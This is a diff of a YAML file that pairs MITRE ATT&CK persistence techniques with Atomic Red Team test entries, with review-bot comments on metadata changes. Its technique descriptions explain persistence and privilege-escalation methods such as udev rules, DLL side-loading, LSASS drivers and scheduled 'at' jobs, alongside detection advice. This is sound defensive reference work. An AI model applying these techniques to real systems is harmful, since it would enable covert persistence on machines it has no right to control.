- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -41668,7 +42058,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
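Review bot: `Alexander Rodchenko` becomes `Rodchenko Aleksandr`, surname first, which is the opposite convention from every other `x_mitre_contributors` entry here and from the fix later in this patch that turns `Goldstein Menachem` into `Menachem Goldstein`. If upstream ATT&CK records the name this way the change is correct as a faithful copy, but confirm it against the source object rather than assuming the new string is the intended spelling.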
@@ -41727,7 +42117,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -41809,7 +42198,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -41966,7 +42354,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -42125,7 +42512,7 @@ persistence:
systemctl daemon-reload
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -42148,16 +42535,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
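Review bot: for T1136 the platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`. Any mapping that derives per-platform output from `x_mitre_platforms` needs to know the new names, or techniques tagged only `Office Suite` or `Identity Provider` will silently fall out of the Office 365 and Google Workspace views; T1136 has `atomic_tests: []` so nothing changes for it, but the same rename is applied to T1098.002, T1137.002 and T1078.004 later in this patch, so the check applies to all of them. Bumping `x_mitre_version` to `2.5` alongside the platform change is consistent with upstream versioning.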
@@ -42184,7 +42570,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -42253,7 +42638,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -42289,7 +42673,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -42308,12 +42692,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -42363,12 +42746,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -42401,9 +42783,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
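Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries drops the Gurucul affiliation from Naveen Vijayaraghavan, who now appears without one, and moves both to the end of the list. If the original combined entry meant both contributors were at Gurucul, the split has lost information; confirm the two new strings against the upstream `x_mitre_contributors` array before merging.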
@@ -42420,9 +42803,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -42468,12 +42850,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -42487,7 +42868,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -42546,7 +42927,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -42572,7 +42952,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -42598,13 +42978,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
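Review bot: same issue as T1037.003 earlier in the patch: T1037.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing replacing them, while its `modified` reverts to `2020-03-24T23:45:03.153Z`. If the two T1037 sub-techniques come from an older upstream object that lacks the attack-spec field, say so in the commit message; otherwise the generator should keep emitting the field.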
@@ -42628,8 +43006,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -42659,7 +43037,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -42702,7 +43079,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -42727,12 +43104,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -42772,8 +43148,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -42781,13 +43159,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
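Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are added near the top of T1078.004 in this and the previous hunk while the next hunk removes the same two lines from the bottom, so that part is a key move, not a content change. The real changes are the platform consolidation (`Azure AD`, `Office 365`, `Google Workspace` to `Office Suite`, `Identity Provider`), the version bump to `1.8`, and the new contributor `Arun Seelagan, CISA`; the `identifier: T1078.004` line in the next hunk is untouched, so the test mapping itself is unaffected by the rename.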
@@ -42818,17 +43196,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
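Review bot: `spec_version: '2.1'` is deleted here and from every other technique object in this patch with nothing replacing it, and STIX 2.1 makes `spec_version` a required common property on every SDO, so anything that re-serializes these `technique` blocks back into STIX or validates them against the 2.1 schema will now fail; either keep the key when generating this file, or state in the commit message that the upstream bundle no longer carries it and that downstream consumers only read the `x_mitre_*` fields. Note also that the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines removed at the bottom of T1078.004 are only moved (they are re-added near the top of the object in the preceding hunk), not dropped, which the diff does not make obvious.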
@@ -42891,7 +43266,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -42925,8 +43300,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -42935,6 +43310,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
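Review bot: the new `Malicious Life by Cybereason` reference URL carries a `#blog-subscribe` fragment, which is the page's newsletter-signup anchor rather than part of the article locator; it should be `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. If this file is generated verbatim from the upstream ATT&CK bundle, leave the line as-is and raise the fix upstream, otherwise strip the fragment here so the citation does not scroll readers to a signup widget.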
@@ -42947,7 +43326,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At - Schedule a job
@@ -42997,7 +43375,7 @@ persistence:
command: 'echo "#{at_command}" | at #{time_spec}'
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -43010,6 +43388,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -43046,17 +43425,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -43102,9 +43481,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
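Review bot: in the new T1546.017 entry the `x_mitre_detection` string is inconsistently formatted: `/etc/udev/rules.d/` and `/lib/udev/rules.d/` are backticked but `/usr/lib/udev/rules.d/` is not, and the quoted scalar ends with a stray space (`2024) '`). More importantly, the description lists five rule directories (including `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`) while the detection guidance monitors only three, so a file-monitoring rule built from that text would miss rules dropped in the other two paths; if this file is regenerated from upstream verbatim, leave the text and flag it upstream, otherwise normalize the backticks, trim the trailing space, and consider listing all five directories. Separately, the diff alignment makes it look as if T1556's trailing `x_mitre_attack_spec_version` / `x_mitre_modified_by_ref` lines now belong to T1546.017; they do, and T1556 received its own copies of both keys earlier in the object and now ends at the added `atomic_tests: []`, so the resulting YAML is consistent, but a reader has to work that out from three hunks.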
@@ -43141,7 +43576,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
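Review bot: the `modified` timestamp of T1546.007 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:09:17.363Z`, and the same regression appears further down on T1556.004, T1574.004, T1574.012 and T1205.002, each of which previously carried a `T14:00:00.188Z`-style value. That pattern suggests the old values were a release-bundle stamp rather than the object's own `modified` and the new ones are the real per-object timestamps; if so, say that in the commit message, because any consumer that treats a newer `modified` as "technique changed" will see these objects as reverted rather than refreshed, and if not, the sync pulled from an older bundle and should be re-run.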
@@ -43165,51 +43600,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -43232,20 +43627,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
